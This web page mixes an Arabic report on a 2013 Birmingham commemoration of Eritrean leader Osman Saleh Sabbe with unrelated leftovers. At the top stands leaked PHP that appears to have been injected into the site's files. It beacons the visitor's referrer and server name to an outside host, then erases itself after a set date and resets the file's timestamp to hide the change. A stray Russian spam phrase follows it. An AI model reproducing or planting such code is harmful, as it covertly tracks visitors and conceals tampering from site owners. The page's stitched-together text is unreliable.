check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } تقرير عن فعاليات الذكرى 26 لاستشهاد القائد الرمز عثمان صالح سبي
кремлевская диета
User Rating: / 2
PoorBest 

 

 

 

 

 

بسم الله الرحمن الرحيم

تقرير عن فعاليات الذكرى 26 لاستشهاد القائد الرمز عثمان صالح سبي

في مدينة برمنجهام البريطانية 27 أبريل 2013م

اقامت حركة الشباب الإرتري للتغيير في مدينة برمنجهام حفل بمناسبة الذكري ال 26 للشهيد الزعيم  عثمان صلح سبي، وافتتح الحفل بتلاوة عطرة من القرأن الكريم التي تلاها الشاب معتصم احمد صايغ ثم ألقى كلمة الإفتتاح الاستاذ سيد علي ابراهيم رئيس حركة الشباب الإرتري للتغيير ونائب رئيس الجبهة الوطنية الديمقراطية الإرترية التي رحب فيها باالحضور وشكر فيها كل من قدم الدعم وشارك في إنجاح هذا العمل، كما أوضح للحضور اهمية العمل المشترك المتمثل في حركة الشباب - برمنجهام واهميته النضالية من اجل إسقاط النظام .

 

هذا وتحدث عن الشهيد عثمان صالح سبي في المرحلة التي عاد فيها الشهيد من العاصمة الإثيوبية أديس أبابا في سبتمبر 1954م إلي موطنه حرقيقو واصبح مديراً لمدرستها كأول مدير ارتري للمدرسة منذ إنشائها في عام 1944م، كما استعرض التحديات التي واجهت الشهيد في تلك المرحلة مروراً بمرحلة  سجنه في عام 1958 ثم رحلته إلي مدينة عصب ومنها هجرته عام 1960م إلي اليمن بحراً.

 

ثم تلتها كلمة الاستاذ احمد صايغ المسؤول الإعلامي للحركة والقيادي في الجبهة الوطنية الديمقراطية الإرترية والتي تناول فيها مرحلة من من حياة سبي, ولادته  في عام 1939- دراسته الإبتدائية و المتوسطة في "حرقيقو" و الثانوية و الجامعة في اثيوبيا و تحدث عن سبي, الإنسان ... المثقف, المؤثر, الدبلوماسي ... رحل من الدنيا و لم يترك شيئا لأبنائه, رحل ليترك فراغا و غاب صوتنا عن العرب و الشرق الأوسط عموما.

ثم بعد ذلك ألقى كلمة المنتدى السيد نوري محمد عبد الله عدد فيها مناقب الشهيد الانسانية والثقافية وانه كان متواضعا وشجاعا، وكان يحسن الى من اختلف معه من المناضلين، وتلتها كلمة شهادة الناشط الصحفي والإعلامي برهاني ولدي جبرئيل المعروف بسوداناو وقد تحدث فيها عن محطة من محطات نضال الشهيد سبي.

كما تحدث الأستاذ محمد عثمان ابو بكر وأدلى بشهادة باعتباره أحد رفاق الشهيد في العديد من مراحل نضاله.

 

كما تحدث الأستاذ شوقي محمد احمد القيادي في الحزب الإسلامي للعدالة و التنمية متناولا دور الشهيد في الإهتمام بالتعليم كمدخل لتحرير الإنسان. وتحدث الأستاذ عبد السلام ممثل حزب النهضة مؤكداً على أهمية الإعلام في توضيح دور زعمائنا والتدقيق في تاريخنا المعاصر.

وكذلك أكد الأستاذ موسى بشير ممثلاً لمؤسسة كبيري مؤكداً على أهمية ذكرى شهداء حركتنا الوطنية (كقيمة ثورتنا للأجيال).

و كذلك تحدث الأستاذ ابراهيم حامد عن البعد التربوي للشهيد في نظرته للصراع الإريتري الإثيوبي الأمر الذي انعكس على توطيد علاقته مع العالم العربي انطلاقا من المصالح المتبادلة.

 

 

 

 

 

 

 

هذا وتحدث كل من الاستاذ عمر صالح القيادي في الحراك الشعبي والاستاذ ملو برهان ممثل حركة الشباب EYSNS  التي تحدث فيها عن تلقيهم معلومات خاطئة عن الشهيد عثمان سبي في المراحل التعليمية في إرتريا, كما شارك المناضل تادسي بكلمة اشاد فيها بالبدور الإيجابي للشهيد في تلك المرحلة. 

 

الجدير بالذكر تم استقبال مشاركات عبر الإسكايب من السويد للمناضل طه احمد وللنجل الأكبر للشهيد عثمان صالح سبي (فراس عثمان صالح سبي) شكر في كلمته الحضور وحركة الشباب الإرتري للتغيير, كما تحدث عبر الإسكايب المناضل ابراهيم قبيل رئيس الجبهة الوطنية الديمقراطية الإرترية من جدة والإستاذ ابراهيم منتاي من المملكة العربية السعودية والأستاذ احمد نجاش سكرتير المجلس الوطني الإرتري ورئيس المكتب التنفيذي لحركة الشباب والمثقف الإرتري للعدالة عبر كلمة  مسجلة من روتردام – هولاندا.

وبعث الاستاذ عمر جابر بمشاركة تمت قراءتها

هذا وكانت كلمة للشاعر علوي حميد, فألقى قصيدة عن سبي, وكذلك ابراهيم محجب والقي الاستاذ ملو برهان قصيدة عن الشهيد باالتجرينية علي مسامع الحضور .

 

في تمام الساعة الثامنة اعلن الاستاذ سيد علي رئيس حركة الشباب نهاية الفعالية وشكر الحضور منوهاً علي الأمسية في غرفة المنتدي الإرتري للتغيير في البالتوك.

 

 

 

حركة الشباب الإرتري للتغيير

في برمنجهام – المملكة المتحدة

30 ابريل 2013

 

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player